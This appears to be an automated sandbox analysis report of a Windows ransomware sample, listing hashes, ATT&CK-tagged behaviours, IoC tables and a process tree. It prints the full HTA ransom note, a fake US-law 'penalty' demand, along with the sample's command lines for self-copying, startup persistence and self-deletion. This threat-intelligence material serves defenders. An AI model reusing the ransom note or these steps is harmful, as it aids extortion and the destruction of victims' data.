7185e8c694984f512a44f240e4b89647c759ba756bd9e9947414941e4342d466

Analysis

max time kernel
1563s
max time network
1564s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
17-07-2024 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
Size

363KB
MD5

36a0cefeb8b0a606358142d4140ea7cf
SHA1

03ce13b4f60d2fc632b67b41b82b5e8cfaf9939f
SHA256

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be
SHA512

63304f3ddca578beac157197581e6a2a762d9cf1fb08fa6ae85dcdc26340ae64badb0f4a9cb47521315c366b70bd0cf89bf1b72be29f89e2d91504cec7ca9093
SSDEEP

6144:VEwaWsAzrp8viKgjdCU641BHoKIPi2CRp2pFSnfJxLw/mq3pT+Qrm9m7s:G9UjdtzIKl2YY3SRxLw/BT+X

Score

10^/10

defense_evasion evasion execution impact ransomware upx

Malware Config

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Doz0JokIxnIySJiJ.hta

Ransom Note

<html> <head> <hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "NO" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/> <style> body{ background-color:#000000; margin:0; } .vau{ margin:10px; height:520px; width:750px } .sc{ margin:1px 50px; font-size:40px; width:750px; height:30px; padding: 10px 20px 10px 20px; background-color:#000000; color:#e92124; font-family: Impact; text-transform: uppercase; text-align: center; } .sc1{ margin:1px 50px; font-size:20px; width: 750px; padding:20px; background-color:#000000; color: #e0dede; font-family: Georgia; text-align: left; } .gr{ margin: 10px 0px; color:#189f29; } .red{ margin: 10px 0px; color:#e92124; } .wh{ margin-top:0px; margin-bottom:10px; } .wt{ margin-top:10px; margin-bottom:0px; } </style> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Notification</title> <script language="vbscript"> sub Window_Onload window.resizeTo 850,725 screenWidth = Document.ParentWindow.Screen.AvailWidth screenHeight = Document.ParentWindow.Screen.AvailHeight posLeft = (screenWidth - 850) / 2 posTop = (screenHeight - 725) / 2 window.moveTo posLeft, posTop end sub </script> </head> <body scroll="no"> <div class="vau"> <div class="sc"> All your files have been encrypted! </div> <div class="sc1"> <p class="wh">All of important data on this computer was encrypted with strong RSA-2048 algorithm due to the violation of the federal laws of the United States of America! (Article 1, Section 8, Clause 8; Article 202; Arcticle 210 of the Criminal Code of U.S.A. provides for a deprivation of liberty for four to twelve years.)</p> <b>Following violations were detected:</b><br /> Your IP adress was used to visit websites containing pornography, child pornography, zoophilia and child abuse!<br /> <p class="gr"><b>To unlock your files you have to pay the penalty!</b></p> <p class="red">You have only <b>96 hours</b> to recover your personal data! After this time your unique key will be deleted and file decryption will become impossible!</p> <p class="red">Each <b>12 hours</b> the payment size will be automatically increased by <b>100$</b>!</p> <p class="gr"><b>You must pay the penalty through the Bitcoin Wallet.</b></p> <p class="wt">To get your unique key and unlock files, you should send the following code:</p> <b class="gr">TAVOb1nrt0pLc0ui-1E1B6352286734D3</b><br /> to our agent e-mails:<br /> <b class="gr">[email protected]</b> or<br /> <b class="gr">[email protected]</b><br /> You will recieve all necessary instructions! </div> <div class="sc"> Hurry up or you will be arrested!!! </div> </div> </body> </html>

Emails

class="gr">[email protected]</b>

class="gr">[email protected]</b><br

URLs

http-equiv="Content-Type"

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	2784	cmd.exe	382

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1744	bcdedit.exe
2872	bcdedit.exe

Deletes itself 1 IoCs

pid	Process
2692	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MVBJbShf.lnk	MVBJbShf.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Doz0JokIxnIySJiJ.hta	MVBJbShf.exe

Executes dropped EXE 26 IoCs

pid	Process
2564	kuox1i4d.exe
2804	MVBJbShf.exe
3020	kuox1i4d.exe
2192	MVBJbShf.exe
1840	Eur8asvc.exe
620	iEQrSps7.exe
300	MCrywN60.exe
688	Eur8asvc.exe
2244	MCrywN60.exe
2400	iEQrSps7.exe
892	iEiFmWzi.exe
2140	63gqV9o7.exe
1672	kbFz0KrX.exe
1744	WZXm6Xeh.exe
1780	Q2Ucl50J.exe
2972	63gqV9o7.exe
1568	iEiFmWzi.exe
324	ZXcAxgJM.exe
2868	WZXm6Xeh.exe
2552	kbFz0KrX.exe
2692	Q2Ucl50J.exe
1660	ZXcAxgJM.exe
2196	OhxPtW9C.exe
1524	mMXTUENU.exe
408	mMXTUENU.exe
2304	OhxPtW9C.exe

Loads dropped DLL 40 IoCs

pid	Process
2944	cmd.exe
2944	cmd.exe
2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2564	kuox1i4d.exe
1940	cmd.exe
1940	cmd.exe
1228	cmd.exe
1228	cmd.exe
2820	cmd.exe
2820	cmd.exe
1840	Eur8asvc.exe
620	iEQrSps7.exe
300	MCrywN60.exe
1772	cmd.exe
1772	cmd.exe
2076	cmd.exe
2076	cmd.exe
2192	MVBJbShf.exe
2192	MVBJbShf.exe
1464	cmd.exe
1464	cmd.exe
3000	cmd.exe
3000	cmd.exe
1236	cmd.exe
1236	cmd.exe
2140	63gqV9o7.exe
892	iEiFmWzi.exe
2416	cmd.exe
2416	cmd.exe
1744	WZXm6Xeh.exe
1672	kbFz0KrX.exe
1780	Q2Ucl50J.exe
324	ZXcAxgJM.exe
1812	cmd.exe
1812	cmd.exe
2804	cmd.exe
2804	cmd.exe
1524	mMXTUENU.exe
2196	OhxPtW9C.exe

UPX packed file 38 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral22/memory/2672-8-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-13-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-12-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-11-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-10-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-7-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-4-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-3-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2672-30-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/3020-46-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/3020-47-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/3020-48-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/3020-52-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2192-66-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/688-105-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2244-123-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2400-136-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2244-135-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2244-141-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2972-344-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2972-368-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/1568-383-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/1568-405-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2868-427-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2552-439-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2692-456-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2552-464-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2868-473-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2692-477-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/1660-553-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/1660-561-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2400-693-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/688-690-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2192-705-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/408-721-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/408-738-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2304-735-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral22/memory/2304-743-0x0000000000400000-0x0000000000510000-memory.dmp	upx

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	kuox1i4d.exe
File opened (read-only)	\??\U:	Q2Ucl50J.exe
File opened (read-only)	\??\T:	OhxPtW9C.exe
File opened (read-only)	\??\Z:	MVBJbShf.exe
File opened (read-only)	\??\U:	Eur8asvc.exe
File opened (read-only)	\??\Z:	kbFz0KrX.exe
File opened (read-only)	\??\Y:	ZXcAxgJM.exe
File opened (read-only)	\??\X:	MVBJbShf.exe
File opened (read-only)	\??\L:	MVBJbShf.exe
File opened (read-only)	\??\R:	iEQrSps7.exe
File opened (read-only)	\??\G:	mMXTUENU.exe
File opened (read-only)	\??\M:	MVBJbShf.exe
File opened (read-only)	\??\S:	63gqV9o7.exe
File opened (read-only)	\??\W:	WZXm6Xeh.exe
File opened (read-only)	\??\R:	kbFz0KrX.exe
File opened (read-only)	\??\S:	Q2Ucl50J.exe
File opened (read-only)	\??\J:	iEQrSps7.exe
File opened (read-only)	\??\H:	63gqV9o7.exe
File opened (read-only)	\??\Q:	iEiFmWzi.exe
File opened (read-only)	\??\G:	Q2Ucl50J.exe
File opened (read-only)	\??\T:	mMXTUENU.exe
File opened (read-only)	\??\V:	OhxPtW9C.exe
File opened (read-only)	\??\R:	kuox1i4d.exe
File opened (read-only)	\??\I:	iEQrSps7.exe
File opened (read-only)	\??\E:	63gqV9o7.exe
File opened (read-only)	\??\R:	iEiFmWzi.exe
File opened (read-only)	\??\P:	WZXm6Xeh.exe
File opened (read-only)	\??\O:	WZXm6Xeh.exe
File opened (read-only)	\??\E:	WZXm6Xeh.exe
File opened (read-only)	\??\S:	kbFz0KrX.exe
File opened (read-only)	\??\E:	Q2Ucl50J.exe
File opened (read-only)	\??\P:	OhxPtW9C.exe
File opened (read-only)	\??\M:	Eur8asvc.exe
File opened (read-only)	\??\R:	WZXm6Xeh.exe
File opened (read-only)	\??\O:	kbFz0KrX.exe
File opened (read-only)	\??\L:	Eur8asvc.exe
File opened (read-only)	\??\E:	iEiFmWzi.exe
File opened (read-only)	\??\Y:	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
File opened (read-only)	\??\L:	kbFz0KrX.exe
File opened (read-only)	\??\G:	ZXcAxgJM.exe
File opened (read-only)	\??\Y:	MVBJbShf.exe
File opened (read-only)	\??\I:	Eur8asvc.exe
File opened (read-only)	\??\M:	MCrywN60.exe
File opened (read-only)	\??\Z:	63gqV9o7.exe
File opened (read-only)	\??\L:	WZXm6Xeh.exe
File opened (read-only)	\??\T:	kbFz0KrX.exe
File opened (read-only)	\??\K:	kbFz0KrX.exe
File opened (read-only)	\??\L:	Q2Ucl50J.exe
File opened (read-only)	\??\Q:	Eur8asvc.exe
File opened (read-only)	\??\L:	MCrywN60.exe
File opened (read-only)	\??\M:	Q2Ucl50J.exe
File opened (read-only)	\??\V:	MCrywN60.exe
File opened (read-only)	\??\K:	63gqV9o7.exe
File opened (read-only)	\??\K:	Eur8asvc.exe
File opened (read-only)	\??\I:	63gqV9o7.exe
File opened (read-only)	\??\G:	iEiFmWzi.exe
File opened (read-only)	\??\N:	OhxPtW9C.exe
File opened (read-only)	\??\Y:	MCrywN60.exe
File opened (read-only)	\??\H:	MCrywN60.exe
File opened (read-only)	\??\R:	63gqV9o7.exe
File opened (read-only)	\??\Z:	iEiFmWzi.exe
File opened (read-only)	\??\M:	kuox1i4d.exe
File opened (read-only)	\??\M:	iEQrSps7.exe
File opened (read-only)	\??\E:	iEQrSps7.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 2236 set thread context of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2564 set thread context of 3020	2564	kuox1i4d.exe	40
PID 2804 set thread context of 2192	2804	MVBJbShf.exe	44
PID 1840 set thread context of 688	1840	Eur8asvc.exe	54
PID 300 set thread context of 2244	300	MCrywN60.exe	55
PID 620 set thread context of 2400	620	iEQrSps7.exe	56
PID 2140 set thread context of 2972	2140	63gqV9o7.exe	108
PID 892 set thread context of 1568	892	iEiFmWzi.exe	115
PID 1744 set thread context of 2868	1744	WZXm6Xeh.exe	127
PID 1672 set thread context of 2552	1672	kbFz0KrX.exe	129
PID 1780 set thread context of 2692	1780	Q2Ucl50J.exe	131
PID 324 set thread context of 1660	324	ZXcAxgJM.exe	184
PID 1524 set thread context of 408	1524	mMXTUENU.exe	374
PID 2196 set thread context of 2304	2196	OhxPtW9C.exe	375

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\Doz0JokIxnIySJiJ.hta	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
944	vssadmin.exe
1072	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Runs ping.exe 1 TTPs 15 IoCs

Remote System Discovery

T1018

pid	Process
3064	PING.EXE
1668	PING.EXE
2912	PING.EXE
2616	PING.EXE
1240	PING.EXE
584	PING.EXE
664	PING.EXE
2004	PING.EXE
1908	PING.EXE
2860	PING.EXE
2000	PING.EXE
2524	PING.EXE
1000	PING.EXE
896	PING.EXE
548	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2192	MVBJbShf.exe
2192	MVBJbShf.exe
2192	MVBJbShf.exe
2192	MVBJbShf.exe
2192	MVBJbShf.exe
2192	MVBJbShf.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
2192	MVBJbShf.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
2192	MVBJbShf.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
2192	MVBJbShf.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2192	MVBJbShf.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
2192	MVBJbShf.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe
688	Eur8asvc.exe
688	Eur8asvc.exe
2400	iEQrSps7.exe
2400	iEQrSps7.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2608	WMIC.exe
Token: SeSecurityPrivilege	2608	WMIC.exe
Token: SeTakeOwnershipPrivilege	2608	WMIC.exe
Token: SeLoadDriverPrivilege	2608	WMIC.exe
Token: SeSystemProfilePrivilege	2608	WMIC.exe
Token: SeSystemtimePrivilege	2608	WMIC.exe
Token: SeProfSingleProcessPrivilege	2608	WMIC.exe
Token: SeIncBasePriorityPrivilege	2608	WMIC.exe
Token: SeCreatePagefilePrivilege	2608	WMIC.exe
Token: SeBackupPrivilege	2608	WMIC.exe
Token: SeRestorePrivilege	2608	WMIC.exe
Token: SeShutdownPrivilege	2608	WMIC.exe
Token: SeDebugPrivilege	2608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2608	WMIC.exe
Token: SeRemoteShutdownPrivilege	2608	WMIC.exe
Token: SeUndockPrivilege	2608	WMIC.exe
Token: SeManageVolumePrivilege	2608	WMIC.exe
Token: 33	2608	WMIC.exe
Token: 34	2608	WMIC.exe
Token: 35	2608	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2608	WMIC.exe
Token: SeSecurityPrivilege	2608	WMIC.exe
Token: SeTakeOwnershipPrivilege	2608	WMIC.exe
Token: SeLoadDriverPrivilege	2608	WMIC.exe
Token: SeSystemProfilePrivilege	2608	WMIC.exe
Token: SeSystemtimePrivilege	2608	WMIC.exe
Token: SeProfSingleProcessPrivilege	2608	WMIC.exe
Token: SeIncBasePriorityPrivilege	2608	WMIC.exe
Token: SeCreatePagefilePrivilege	2608	WMIC.exe
Token: SeBackupPrivilege	2608	WMIC.exe
Token: SeRestorePrivilege	2608	WMIC.exe
Token: SeShutdownPrivilege	2608	WMIC.exe
Token: SeDebugPrivilege	2608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2608	WMIC.exe
Token: SeRemoteShutdownPrivilege	2608	WMIC.exe
Token: SeUndockPrivilege	2608	WMIC.exe
Token: SeManageVolumePrivilege	2608	WMIC.exe
Token: 33	2608	WMIC.exe
Token: 34	2608	WMIC.exe
Token: 35	2608	WMIC.exe
Token: SeBackupPrivilege	2020	vssvc.exe
Token: SeRestorePrivilege	2020	vssvc.exe
Token: SeAuditPrivilege	2020	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2236 wrote to memory of 2672	2236	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2672 wrote to memory of 2676	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2672 wrote to memory of 2676	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2672 wrote to memory of 2676	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2672 wrote to memory of 2676	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2672 wrote to memory of 2944	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2672 wrote to memory of 2944	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2672 wrote to memory of 2944	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2672 wrote to memory of 2944	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2944 wrote to memory of 2564	2944	cmd.exe	35
PID 2944 wrote to memory of 2564	2944	cmd.exe	35
PID 2944 wrote to memory of 2564	2944	cmd.exe	35
PID 2944 wrote to memory of 2564	2944	cmd.exe	35
PID 2672 wrote to memory of 2804	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2672 wrote to memory of 2804	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2672 wrote to memory of 2804	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2672 wrote to memory of 2804	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2672 wrote to memory of 2692	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2672 wrote to memory of 2692	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2672 wrote to memory of 2692	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2672 wrote to memory of 2692	2672	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2692 wrote to memory of 2524	2692	cmd.exe	39
PID 2692 wrote to memory of 2524	2692	cmd.exe	39
PID 2692 wrote to memory of 2524	2692	cmd.exe	39
PID 2692 wrote to memory of 2524	2692	cmd.exe	39
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 2564 wrote to memory of 3020	2564	kuox1i4d.exe	40
PID 3020 wrote to memory of 2892	3020	kuox1i4d.exe	41
PID 3020 wrote to memory of 2892	3020	kuox1i4d.exe	41
PID 3020 wrote to memory of 2892	3020	kuox1i4d.exe	41
PID 3020 wrote to memory of 2892	3020	kuox1i4d.exe	41
PID 2892 wrote to memory of 2616	2892	cmd.exe	43
PID 2892 wrote to memory of 2616	2892	cmd.exe	43
PID 2892 wrote to memory of 2616	2892	cmd.exe	43
PID 2892 wrote to memory of 2616	2892	cmd.exe	43
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2804 wrote to memory of 2192	2804	MVBJbShf.exe	44
PID 2192 wrote to memory of 1940	2192	MVBJbShf.exe	45
PID 2192 wrote to memory of 1940	2192	MVBJbShf.exe	45
PID 2192 wrote to memory of 1940	2192	MVBJbShf.exe	45
PID 2192 wrote to memory of 1940	2192	MVBJbShf.exe	45
PID 1940 wrote to memory of 1840	1940	cmd.exe	47
PID 1940 wrote to memory of 1840	1940	cmd.exe	47
PID 1940 wrote to memory of 1840	1940	cmd.exe	47
PID 1940 wrote to memory of 1840	1940	cmd.exe	47

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 46 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
680	attrib.exe
2996	attrib.exe
944	attrib.exe
2816	attrib.exe
1980	attrib.exe
1964	attrib.exe
680	attrib.exe
2620	attrib.exe
1464	attrib.exe
2980	attrib.exe
2544	attrib.exe
2204	attrib.exe
992	attrib.exe
1744	attrib.exe
2876	attrib.exe
2872	attrib.exe
2892	attrib.exe
408	attrib.exe
1344	attrib.exe
1000	attrib.exe
376	attrib.exe
2564	attrib.exe
1780	attrib.exe
2980	attrib.exe
2312	attrib.exe
2440	attrib.exe
1640	attrib.exe
1500	attrib.exe
1292	attrib.exe
2656	attrib.exe
1208	attrib.exe
600	attrib.exe
2804	attrib.exe
1912	attrib.exe
880	attrib.exe
2536	attrib.exe
300	attrib.exe
2776	attrib.exe
852	attrib.exe
2356	attrib.exe
1640	attrib.exe
2904	attrib.exe
2800	attrib.exe
548	attrib.exe
1720	attrib.exe
2836	attrib.exe

C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
"C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
  "C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe"
  2⤵
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\467C2B~1.EXE" > "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe"
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe" && "C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "START" "60000"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe
      "C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "START" "60000"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2564
    - - C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "START" "60000"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:3020
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Mg7xeg5b.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2892
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        7⤵
        Runs ping.exe
        
        PID:2616
- - C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe
    "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" Doz0JokIxnIySJiJ
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe
      "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" Doz0JokIxnIySJiJ
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
